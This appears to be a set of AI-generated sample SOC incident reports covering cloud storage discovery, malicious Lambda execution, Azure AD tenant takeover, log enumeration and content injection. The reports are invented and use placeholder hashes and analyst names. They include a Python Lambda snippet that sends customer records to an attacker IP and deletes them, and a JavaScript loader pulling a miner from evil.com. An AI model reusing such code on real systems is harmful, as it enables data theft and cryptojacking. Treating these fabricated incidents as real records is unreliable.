ipinfo.io: Returns IP and location details
Purpose:
Attacker checking if the system is in a target country (e.g., US)
May adjust behavior based on location (e.g., don’t run if in Russia/China)
User Status:
User unaware; macro executed silently
3. Investigation Findings:
Timeline:
10:00 – Email received
10:05 – Document opened
10:06-10:10 – Script runs
10:25 – Alert
10:27 – SOC investigates
10:28 – PowerShell terminated
Indicators of Compromise (IoCs):
URLs:
– http://ip-api.com/json
– http://api.ipify.org
– http://ipinfo.io/json
File:
– Document.docm (SHA256: a1b2c3d4…)
4. Containment Actions:
Immediate Actions:
Terminated PowerShell.
Quarantined email.
Deleted macro document.
Reset user password.
Host Remediation:
Full scan (clean).
No reimage needed.
User Education:
Counseled on phishing.
5. Root Cause Analysis:
Primary Cause: User opened malicious macro document.
Contributing Factors:
Macros enabled.
No ASR rule blocking Office child processes.
6. Business Impact:
Operational Impact: None.
Data Exposure: None (only location data, already public).
7. Remediation & Prevention:
Completed Actions:
Reconnaissance stopped.
User educated.
Technical Controls Enhanced:
Enabled ASR rule “Block Office applications from creating child processes”.
Blocked macros from internet.
8. Conclusion:
An attacker used a macro-enabled document to run PowerShell that queried geolocation APIs to determine the system’s location. CrowdStrike detected the anomalous API calls and enabled termination. The reconnaissance was part of a larger attack chain that was stopped.
Closure Rationale: Reconnaissance detected; process terminated; user educated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-13 11:30 EST
End of Batch 35
Ready for your next batch of prompts whenever you are.
Batch 36: Cloud & Collection Incident Reports
Here are the next 5 detailed SOC incident reports.
176. T1619 – Cloud Storage Object Discovery (AWS GuardDuty Detection)
AWS GuardDuty Alert Details
Alert ID: GUARDDUTY-STORAGE-DISCOVERY-1619-7842 Alert Time: 2024-03-14 09:30:15 EST Severity: MEDIUM (72/100) Source: AWS GuardDuty Rule: “Anomalous S3 Bucket Enumeration” MITRE ATT&CK: T1619 – Cloud Storage Object Discovery
Alert Details:
Detection: IAM user enumerated multiple S3 buckets and objects
AWS Account: 123456789012 (Production) IAM User: svc_monitoring (Service Account) Source IP: 185.143.221[.]89 (Bulgaria) Time: 09:15-09:30 EST
API Calls (from CloudTrail):
09:15:22 – s3:ListBuckets (list all S3 buckets) – SUCCESS
09:16:45 – s3:ListObjects on bucket: company-data-prod (2,847 objects listed)
09:17:38 – s3:ListObjects on bucket: company-backups-prod (1,234 objects)
09:18:22 – s3:ListObjects on bucket: company-logs-prod (4,567 objects)
09:19:05 – s3:ListObjects on bucket: company-finance-reports (892 objects)
09:19:48 – s3:GetObject on key: finance-reports/Q1_2024.xlsx (12 MB) – DOWNLOADED
09:20:15 – s3:GetObject on key: finance-reports/Q2_2024.xlsx (11 MB) – DOWNLOADED
09:20:55 – s3:GetObject on key: customer-data/export.csv (23 MB) – DOWNLOADED
… (total 12 GetObject calls)
Detection Logic:
Service account svc_monitoring normally only lists its own bucket
This activity shows enumeration of multiple buckets not normally accessed
Source IP outside expected region (Bulgaria, not US)
Pattern matches cloud storage discovery and data access
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify GuardDuty alert
GuardDuty Console, CloudTrail
Confirmed unauthorized S3 enumeration
2. Account Investigation
Check svc_monitoring activity
AWS IAM, CloudTrail
Service account credentials compromised (leaked in GitHub)
3. Immediate Action
Rotate access keys
AWS IAM
svc_monitoring keys rotated
4. Bucket Permissions
Review and restrict bucket policies
S3 Bucket Policies
Removed unnecessary permissions; enforced least privilege
5. Data Access Assessment
Identify downloaded objects
CloudTrail logs
12 files downloaded (46 MB) – financial and customer data
6. Incident Response
Activate breach response
Legal, Management
Data breach declared
Jira Incident Report
Ticket: SOC-2024-216 Summary: T1619 – Cloud Storage Object Discovery & Data Access from Compromised Service Account Status: RESOLVED Resolution: MALICIOUS – Data Access Confirmed Priority: P2 – MEDIUM Labels: T1619, cloud-storage-discovery, s3, guardduty, compromised-credentials Components: Cloud-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: AWS GuardDuty.
Alert: “Anomalous S3 Bucket Enumeration”.
IAM User: svc_monitoring (service account).
Source IP: 185.143.221[.]89 (Bulgaria).
Activity: Listed 5 buckets, downloaded 12 objects (46 MB).
Time: 2024-03-14 09:30 EST.
Technique: MITRE ATT&CK T1619 – Cloud Storage Object Discovery.
2. Technical Analysis:
Attack Chain:
08:30 – svc_monitoring credentials leaked via public GitHub repository
08:45 – Attacker uses credentials to access AWS from Bulgaria
09:15-09:30 – Bucket enumeration and data download
09:30 – GuardDuty detects
Data Accessed:
Q1_2024.xlsx, Q2_2024.xlsx (financial reports)
customer-data/export.csv (customer PII)
backup files, logs, etc. (no sensitive data beyond these)
Total: 12 files, 46 MB
Compromised Credentials:
IAM User: svc_monitoring
Permissions: Read access to multiple S3 buckets (excessive)
Leak Source: Public GitHub (developer committed access key)
Attacker Intent:
Data theft (financial, customer data)
3. Investigation Findings:
Timeline:
08:30 – Credentials compromised
08:45 – Attacker accesses AWS
09:15-09:30 – Data access
09:30 – Alert
09:32 – SOC investigates
09:33 – Keys rotated
09:35 – Access revoked
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
– S3 operations: ListBuckets, ListObjects, GetObject
Credentials:
– svc_monitoring access keys (rotated)
Data:
– 12 files, 46 MB accessed (list attached)
4. Containment Actions:
Immediate Actions:
Rotated svc_monitoring access keys.
Removed excessive S3 permissions (least privilege).
Blocked attacker IP at AWS WAF.
Disabled compromised IAM user temporarily.
Data Protection:
Determined scope of accessed data (46 MB).
Notified affected data owners.
Initiated breach response (customer PII exposure).
Cloud Remediation:
Enabled S3 server access logging.
Implemented S3 Block Public Access.
5. Root Cause Analysis:
Primary Cause: Service account credentials leaked in public GitHub repository.
Contributing Factors:
No secret scanning.
Service account had excessive permissions.
No MFA for service accounts.
6. Business Impact:
Operational Impact: None.
Data Exposure: 46 MB of financial and customer data accessed (downloaded).
Regulatory Impact: GDPR/CCPA breach (customer PII).
7. Remediation & Prevention:
Completed Actions:
Keys rotated.
Permissions restricted.
Breach response initiated.
Technical Controls Enhanced:
Implemented secret scanning (GitHub Advanced Security).
Enforced least privilege for service accounts.
Enabled GuardDuty with automated response.
Deployed AWS Config rules for S3 bucket policies.
8. Conclusion:
An attacker obtained compromised service account credentials from a public GitHub repository and used them to enumerate and download 46 MB of sensitive data from S3. GuardDuty detected the anomalous activity, enabling key rotation and breach response.
Closure Rationale: Data accessed; access revoked; breach response initiated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-14 10:30 EST
177. T1648 – Serverless Execution (AWS GuardDuty Detection)
AWS GuardDuty Alert Details
Alert ID: GUARDDUTY-SERVERLESS-1648-7842 Alert Time: 2024-03-14 14:15:33 EST Severity: HIGH (85/100) Source: AWS GuardDuty + CloudTrail Rule: “Unauthorized Lambda Function Creation and Invocation” MITRE ATT&CK: T1648 – Serverless Execution
Alert Details:
Detection: Unauthorized creation and invocation of AWS Lambda function
AWS Account: 123456789012 (Development) IAM User: dev_user (compromised developer account) Source IP: 185.143.221[.]89 (Bulgaria) Time: 14:00-14:15 EST
API Calls (CloudTrail):
14:00:15 – iam:CreateRole – created role “lambda-exec-role”
14:01:22 – iam:AttachRolePolicy – attached Lambda execution policy
14:02:45 – lambda:CreateFunction – created function “internal-backup-processor”
14:03:30 – lambda:UpdateFunctionCode – uploaded code (ZIP) from S3 (malicious)
14:04:15 – lambda:CreateEventSourceMapping – mapped to DynamoDB table “customer-data”
14:05:22 – lambda:InvokeFunction – invoked function (test)
14:06:00-14:15:00 – 847 invocations of the function (processing data)
Function Code Analysis (from Lambda logs):
Function reads from DynamoDB table “customer-data”
Exfiltrates data to external IP 185.143.221[.]89:443
Deletes records after exfiltration
Detection Logic:
Developer account dev_user does not normally create Lambda functions
Source IP anomalous (Bulgaria)
Function accesses sensitive DynamoDB table
Data exfiltration detected via VPC Flow Logs
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify GuardDuty alert
GuardDuty Console, CloudTrail
Confirmed unauthorized Lambda creation and invocation
2. Function Analysis
Examine Lambda code
AWS Lambda Console
Function exfiltrates DynamoDB data
3. Immediate Action
Delete Lambda function
AWS Lambda
Function deleted
4. Role Cleanup
Delete IAM role and detach policies
AWS IAM
Role “lambda-exec-role” deleted
5. Account Remediation
Disable dev_user account
AWS IAM
Keys rotated; user disabled
6. Data Assessment
Determine exfiltrated data
DynamoDB logs, CloudWatch
8,000 customer records exfiltrated
Jira Incident Report
Ticket: SOC-2024-217 Summary: T1648 – Serverless Execution: Malicious Lambda Exfiltrates Customer Data Status: RESOLVED Resolution: MALICIOUS – Data Breach Confirmed Priority: P1 – CRITICAL Labels: T1648, serverless-execution, lambda, guardduty, data-breach Components: Cloud-Security, Serverless-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: AWS GuardDuty + CloudTrail.
Alert: “Unauthorized Lambda Function Creation and Invocation”.
IAM User: dev_user (compromised developer account).
Function: internal-backup-processor (malicious).
Data: 8,000 customer records exfiltrated.
Time: 2024-03-14 14:15 EST.
Technique: MITRE ATT&CK T1648 – Serverless Execution.
2. Technical Analysis:
Attack Chain:
13:30 – dev_user credentials compromised (phishing)
13:45 – Attacker logs into AWS from Bulgaria
14:00-14:05 – Creates IAM role and Lambda function
14:05-14:15 – Invokes function 847 times, exfiltrating data
14:15 – GuardDuty detects
Lambda Function Analysis:
Name: internal-backup-processor
Runtime: Python 3.9
Code:
import boto3, requests
def handler(event, context):
dynamo = boto3.client(‘dynamodb’)
data = dynamo.scan(TableName=’customer-data’)
for item in data[‘Items’]:
requests.post(‘https://185.143.221[.]89/exfil’, json=item)
dynamo.delete_item(Key=item[‘id’])
Purpose: Exfiltrate and delete customer records
Data Exfiltrated:
8,000 customer records (name, address, email, phone, SSN)
Total size: ~40 MB
Impact:
Customer data stolen
DynamoDB table partially deleted
3. Investigation Findings:
Timeline:
13:30 – Account compromised
13:45 – Attacker logs in
14:00-14:15 – Function creation and invocation
14:15 – Alert
14:17 – SOC investigates
14:18 – Function deleted
14:19 – Role deleted
14:20 – Account disabled
Indicators of Compromise (IoCs):
AWS:
– Lambda function: internal-backup-processor
– IAM role: lambda-exec-role
– Exfiltration IP: 185.143.221[.]89
Data:
– 8,000 customer records exfiltrated
4. Containment Actions:
Immediate Actions:
Deleted malicious Lambda function.
Deleted IAM role.
Rotated dev_user keys.
Disabled compromised account.
Blocked exfiltration IP.
Data Protection:
Determined scope of data loss (8,000 records).
Notified legal, PR, management.
Began customer notification process.
Restored deleted records from backup (DynamoDB point-in-time recovery).
Cloud Remediation:
Implemented AWS Config rules to monitor Lambda creation.
Enabled VPC Flow Logs for Lambda functions.
Enhanced IAM policies.
5. Root Cause Analysis:
Primary Cause: Developer account compromised.
Contributing Factors:
No MFA on account.
Excessive permissions allowed Lambda creation.
No monitoring for new Lambda functions.
6. Business Impact:
Operational Impact: None.
Data Exposure: 8,000 customer records stolen.
Regulatory Impact: GDPR/CCPA breach.
Reputational Impact: Significant.
7. Remediation & Prevention:
Completed Actions:
Function deleted.
Account secured.
Breach response initiated.
Technical Controls Enhanced:
Enforced MFA for all users.
Implemented least privilege IAM policies.
Enabled GuardDuty with automated response.
Deployed AWS Config rules for Lambda changes.
8. Conclusion:
An attacker compromised a developer account and created a malicious Lambda function that exfiltrated 8,000 customer records from DynamoDB. GuardDuty detected the anomalous activity, enabling deletion of the function. A full data breach response was initiated.
Closure Rationale: Data exfiltrated; function deleted; breach response initiated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-14 15:30 EST
178. T1651 – Cloud Administration Command (Azure AD Detection)
Azure AD Alert Details
Alert ID: AAD-CLOUD-ADMIN-1651-7842 Alert Time: 2024-03-14 11:30:22 EST Severity: HIGH (88/100) Source: Azure AD Identity Protection + Audit Logs Rule: “Suspicious Cloud Administration Commands from Unusual Location” MITRE ATT&CK: T1651 – Cloud Administration Command
Alert Details:
Detection: Global administrator running high-impact commands from unusual location
User: jwilson@company.com (Global Administrator) Source IP: 185.143.221[.]89 (Bulgaria) Time: 11:15-11:30 EST
Azure AD Audit Events:
11:15:22 – Add member to group “Global Administrators” (added user attacker@evil.com) – SUCCESS
11:17:45 – Create new conditional access policy “Allow All” (disables MFA) – SUCCESS
11:19:12 – Update domain federation settings (change authentication to attacker-controlled IDP) – SUCCESS
11:21:33 – Add application registration “Internal Tools” with high privileges – SUCCESS
11:23:50 – Grant admin consent to application (allows app to read all mailboxes) – SUCCESS
11:25:15 – Reset password for 5 privileged users (including CEO) – SUCCESS
Detection Logic:
jwilson is global admin, but these actions are highly unusual
Source IP Bulgaria (normal location: US)
Commands are high-impact (adding admins, changing federation, resetting passwords)
Pattern matches attacker taking over Azure AD tenant
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Azure AD audit logs
Azure AD Portal
Confirmed malicious admin commands
2. User Verification
Contact jwilson
Phone, Teams
jwilson did NOT perform these actions (account compromised)
3. Immediate Action
Disable jwilson account
Azure AD
Account disabled
4. Revert Changes
Reverse all malicious actions
Azure AD PowerShell
Removed attacker from Global Admins, deleted conditional access policy, reverted federation settings, deleted malicious app, reset passwords for affected users
5. Account Remediation
Reset jwilson password
Azure AD
Password reset; MFA enforced
6. Incident Response
Activate emergency response
Management, Legal
Tenant takeover attempt declared
Jira Incident Report
Ticket: SOC-2024-218 Summary: T1651 – Cloud Administration Command: Attacker Takes Control of Azure AD Tenant Status: RESOLVED Resolution: MALICIOUS – Changes Reverted, Account Secured Priority: P1 – CRITICAL Labels: T1651, cloud-admin-command, azure-ad, compromised-admin Components: Cloud-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Azure AD Identity Protection + Audit Logs.
Alert: “Suspicious Cloud Administration Commands from Unusual Location”.
User: jwilson@company.com (Global Administrator).
Source IP: 185.143.221[.]89 (Bulgaria).
Actions: Added global admin, changed federation, reset passwords, etc.
Time: 2024-03-14 11:30 EST.
Technique: MITRE ATT&CK T1651 – Cloud Administration Command.
2. Technical Analysis:
Attack Chain:
10:30 – jwilson account compromised via phishing
10:45 – Attacker logs into Azure AD portal from Bulgaria
11:00 – Attacker enumerates admin roles
11:15-11:30 – Malicious admin commands
11:30 – Azure AD detects
Malicious Actions:
Added attacker as Global Admin: attacker@evil.com (now has full control)
Created Conditional Access policy “Allow All”: disables MFA for all users
Changed federation settings: redirects authentication to attacker-controlled IDP
Added malicious app “Internal Tools”: with permissions to read all mailboxes
Granted admin consent: allows app to access all mailboxes
Reset passwords: for CEO, CFO, CTO, and two IT admins
Attacker Intent:
Full takeover of Azure AD tenant
Access all mailboxes and data
Lock out legitimate admins
Compromised Admin:
jwilson (Global Admin) – no MFA (now enforced)
3. Investigation Findings:
Timeline:
10:30 – Account compromised
10:45 – Attacker logs in
11:15-11:30 – Malicious actions
11:30 – Alert
11:32 – SOC investigates
11:33 – jwilson account disabled
11:35 – Reversion of changes begins
11:50 – All changes reverted
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
Account:
– jwilson (compromised)
– attacker@evil.com (added as Global Admin, now removed)
App:
– “Internal Tools” (malicious app, removed)
4. Containment Actions:
Immediate Actions:
Disabled jwilson account.
Removed attacker@evil.com from Global Admins.
Deleted “Allow All” conditional access policy.
Reverted federation settings to original.
Deleted malicious app “Internal Tools”.
Reset passwords for all affected users (CEO, CFO, CTO, IT admins).
Blocked attacker IP.
Post-Incident:
Enforced MFA for all admins.
Implemented Privileged Identity Management (JIT access).
Audited all recent admin actions.
5. Root Cause Analysis:
Primary Cause: Global admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
No alerts for critical admin changes.
6. Business Impact:
Operational Impact: Temporary disruption during recovery.
Data Exposure: Potential mailbox access; none confirmed.
Reputational Impact: High (tenant takeover).
7. Remediation & Prevention:
Completed Actions:
Changes reverted.
Account secured.
Attacker blocked.
Technical Controls Enhanced:
Enforced MFA for all admins.
Implemented Conditional Access policies requiring trusted locations.
Enabled Azure AD Identity Protection alerts for admin changes.
Deployed Privileged Identity Management.
8. Conclusion:
An attacker compromised a global admin account and performed critical cloud administration commands, attempting to take over the Azure AD tenant. Azure AD detected the anomalous activity, enabling rapid reversion of all changes and securing the account.
Closure Rationale: Malicious changes reverted; admin account secured; tenant protected.
Analyst: [Your Name], SOC Analyst Date: 2024-03-14 12:30 EST
179. T1654 – Log Enumeration (CloudTrail Detection)
CloudTrail Alert Details
Alert ID: CLOUDTRAIL-LOG-ENUM-1654-7842 Alert Time: 2024-03-14 16:30:45 EST Severity: MEDIUM (68/100) Source: AWS CloudTrail + GuardDuty Rule: “Anomalous CloudTrail Log Access” MITRE ATT&CK: T1654 – Log Enumeration
Alert Details:
Detection: IAM user enumerating CloudTrail trails and logs
IAM User: dev_user (developer account) Source IP: 185.143.221[.]89 (Bulgaria) Time: 16:15-16:30 EST
API Calls (CloudTrail):
16:15:10 – cloudtrail:DescribeTrails (list all trails) – SUCCESS
16:15:45 – cloudtrail:GetTrailStatus (get status of each trail) – SUCCESS
16:16:22 – cloudtrail:LookupEvents (search logs for specific users/actions) – SUCCESS
16:17:05 – cloudtrail:LookupEvents (search for “CreateUser”) – SUCCESS
16:17:48 – cloudtrail:LookupEvents (search for “ConsoleLogin”) – SUCCESS
16:18:30 – s3:ListObjects on bucket: company-cloudtrail-logs (trail logs) – SUCCESS
16:19:15 – s3:GetObject on log file 123456789012_CloudTrail_us-east-1_20240314T1600Z.json (downloaded)
16:20:00 – s3:GetObject on another log file (downloaded)
Detection Logic:
dev_user has no legitimate need to access CloudTrail logs
Source IP unusual (Bulgaria)
LookupEvents used to search for specific activities
Log files downloaded from S3
Pattern matches attacker checking what logs exist and what they record
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CloudTrail logs
CloudTrail Console, GuardDuty
Confirmed log enumeration and download
2. Account Investigation
Check dev_user activity
AWS IAM, CloudTrail
Developer account compromised (phishing)
3. Immediate Action
Rotate access keys
AWS IAM
dev_user keys rotated
4. Log Access Restriction
Revoke unnecessary permissions
IAM Policy
Removed CloudTrail and S3 log access
5. Impact Assessment
Determine what logs were accessed
CloudTrail
Attacker downloaded logs containing 2 weeks of API activity
6. Account Remediation
Disable dev_user temporarily
AWS IAM
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-219 Summary: T1654 – Log Enumeration: Attacker Accesses and Downloads CloudTrail Logs Status: RESOLVED Resolution: MALICIOUS – Logs Accessed, Permissions Revoked Priority: P2 – MEDIUM Labels: T1654, log-enumeration, cloudtrail, guardduty, compromised-account Components: Cloud-Security, Logging
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: AWS CloudTrail + GuardDuty.
Alert: “Anomalous CloudTrail Log Access”.
IAM User: dev_user (developer account).
Source IP: 185.143.221[.]89 (Bulgaria).
Activity: Described trails, looked up events, downloaded 2 log files.
Time: 2024-03-14 16:30 EST.
Technique: MITRE ATT&CK T1654 – Log Enumeration.
2. Technical Analysis:
Attack Chain:
15:30 – dev_user account compromised (phishing)
15:45 – Attacker logs into AWS from Bulgaria
16:00 – Attacker enumerates CloudTrail logs
16:15-16:30 – Log enumeration and download
16:30 – GuardDuty detects
Logs Downloaded:
123456789012_CloudTrail_us-east-1_20240314T1600Z.json (2 weeks of API calls)
Another file with additional logs
Total: 2 files, ~5 MB
Information in Logs:
All API calls made by all users in the account
Includes sensitive operations (IAM changes, S3 access, Lambda creations)
Attacker can analyze logs to understand environment and avoid detection
Attacker Intent:
Reconnaissance: see what activities are logged
Identify which actions might trigger alerts
Plan further attacks
User Status:
Account compromised; user unaware
3. Investigation Findings:
Timeline:
15:30 – Account compromised
15:45 – Attacker logs in
16:00-16:30 – Log enumeration
16:30 – Alert
16:32 – SOC investigates
16:33 – Keys rotated
16:34 – Permissions revoked
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
API Calls:
– cloudtrail:DescribeTrails
– cloudtrail:LookupEvents
– s3:GetObject on cloudtrail bucket
Account:
– dev_user (compromised)
4. Containment Actions:
Immediate Actions:
Rotated dev_user access keys.
Removed CloudTrail and S3 log access from IAM policy.
Blocked attacker IP.
Disabled account temporarily.
Post-Incident:
Reviewed CloudTrail logs for further malicious activity.
No evidence of other actions.
Account Remediation:
Enforced MFA.
5. Root Cause Analysis:
Primary Cause: Developer account compromised via phishing.
Contributing Factors:
No MFA on account.
Excessive permissions (could access logs).
6. Business Impact:
Operational Impact: None.
Data Exposure: 2 weeks of CloudTrail logs exposed; no customer data.
7. Remediation & Prevention:
Completed Actions:
Keys rotated.
Permissions restricted.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Implemented least privilege IAM policies.
Enabled GuardDuty with log access alerts.
8. Conclusion:
An attacker compromised a developer account and enumerated CloudTrail logs, downloading 2 weeks of API activity. GuardDuty detected the anomalous log access, enabling revocation of permissions. The logs contained no customer data but could aid further attacks.
Closure Rationale: Logs accessed; permissions revoked; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-14 17:30 EST
180. T1659 – Content Injection (Imperva WAF Detection)
Imperva WAF Alert Details
Alert ID: IMPERVA-CONTENT-INJECT-1659-7842 Alert Time: 2024-03-14 10:30:22 EST Severity: HIGH (85/100) Source: Imperva Web Application Firewall Rule: “Suspicious Content Injection Detected – JavaScript Added” MITRE ATT&CK: T1659 – Content Injection
Alert Details:
Detection: Malicious JavaScript injected into website pages
Target: www.company.com (Public Website) Time: 10:15-10:30 EST
Injection Details:
Attacker exploited vulnerable file upload to replace logo.png with malicious image
Image contains embedded JavaScript (steganography)
JavaScript loads from malicious domain and injects crypto-miner
Sequence:
10:15:22 – POST /admin/upload.php (file upload: logo.png)
10:15:45 – File uploaded successfully
10:16:12 – GET /images/logo.png (served to visitors)
10:16:30 – JavaScript in image executes in visitor browsers
10:17:00 – Visitors redirected to malicious ad server
10:18:00 – Crypto-miner loaded in background
Imperva Detection:
WAF detected anomalous file upload (image with embedded script)
Post-analysis: logo.png contains JavaScript in EXIF metadata
JavaScript: document.write(”)
Impact:
All visitors to website (10,000+ in 15 minutes) exposed to malicious script
Crypto-miner runs in their browsers
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Imperva alert
Imperva WAF Console
Confirmed content injection attack
2. Immediate Action
Remove malicious image
Web Team
Replaced logo.png with clean version
3. Vulnerability Assessment
Identify how injection occurred
Code Review
File upload endpoint allowed image with embedded script
4. Patch Vulnerability
Fix file upload validation
Web Team
Implemented strict MIME type checking and content validation
5. IP Blocking
Block attacker IP
WAF, Firewall
185.143.221[.]89 blocked
6. PR Response
Monitor for customer complaints
PR Team
No significant complaints; issue resolved quickly
Jira Incident Report
Ticket: SOC-2024-220 Summary: T1659 – Content Injection via Malicious Image with Embedded JavaScript Status: RESOLVED Resolution: MALICIOUS – Content Removed, Vulnerability Patched Priority: P2 – MEDIUM Labels: T1659, content-injection, waf, imperva, defacement Components: Web-Security, Application-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Imperva Web Application Firewall.
Alert: “Suspicious Content Injection Detected – JavaScript Added”.
Target: www.company.com.
Method: Malicious image (logo.png) with embedded JavaScript.
Impact: 10,000+ visitors exposed to crypto-miner.
Time: 2024-03-14 10:30 EST.
Technique: MITRE ATT&CK T1659 – Content Injection.
2. Technical Analysis:
Attack Chain:
10:00 – Attacker scans for vulnerable file upload
10:05 – Finds /admin/upload.php (no authentication)
10:15 – Uploads logo.png (image with embedded JavaScript in EXIF)
10:16 – Image served to all visitors
10:17-10:30 – Malicious script loads crypto-miner in visitor browsers
10:30 – Imperva detects
Malicious Image:
File: logo.png (appears normal)
EXIF metadata: Contains JavaScript
JavaScript:
var s = document.createElement(‘script’);
s.src = ‘https://evil.com/analytics.js’;
document.head.appendChild(s);
analytics.js: Loads Coinhive crypto-miner (Monero)
Impact:
10,000+ visitors affected (estimated 15 minutes)
Their CPU used for mining
No data stolen
Vulnerability:
Upload endpoint allowed images without validating content
No authentication on admin functions
3. Investigation Findings:
Timeline:
10:00 – Attack begins
10:15 – Upload
10:16-10:30 – Malicious content served
10:30 – Alert
10:32 – SOC investigates
10:33 – Image replaced
10:35 – Vulnerability patched
Indicators of Compromise (IoCs):
File:
– logo.png (SHA256: a1b2c3d4…) – replaced
Network:
– evil.com (blocked)
– 185.143.221[.]89 (attacker IP)
4. Containment Actions:
Immediate Actions:
Replaced logo.png with clean version.
Blocked attacker IP.
Blocked evil.com domain.
Cleared browser cache (forced via version change).
Vulnerability Remediation:
Added authentication to upload endpoint.
Implemented strict MIME type checking.
Added content validation (scan for embedded scripts).
Deployed WAF rule to block image uploads with embedded code.
PR Response:
Monitored social media (no backlash).
No customer complaints received.
5. Root Cause Analysis:
Primary Cause: Unauthenticated file upload with insufficient validation.
Contributing Factors:
No authentication on admin functions.
No content validation for images.
6. Business Impact:
Operational Impact: Website served malicious content for 15 minutes.
Reputational Impact: Minimal (quick recovery, low awareness).
Financial Impact: None.
7. Remediation & Prevention:
Completed Actions:
Malicious content removed.
Vulnerability patched.
Attacker blocked.
Technical Controls Enhanced:
Added authentication to all admin functions.
Implemented content validation for uploaded files.
Deployed WAF rules for content injection.
8. Conclusion:
An attacker exploited an unauthenticated file upload to inject malicious JavaScript into the company website, causing visitors’ browsers to mine cryptocurrency. Imperva detected the attack, enabling rapid removal and patching. No data was stolen.
Closure Rationale: Content removed; vulnerability patched; attacker blocked.
Analyst: [Your Name], SOC Analyst Date: 2024-03-14 11:30 EST
End of Batch 36
Ready for your next batch of prompts whenever you are.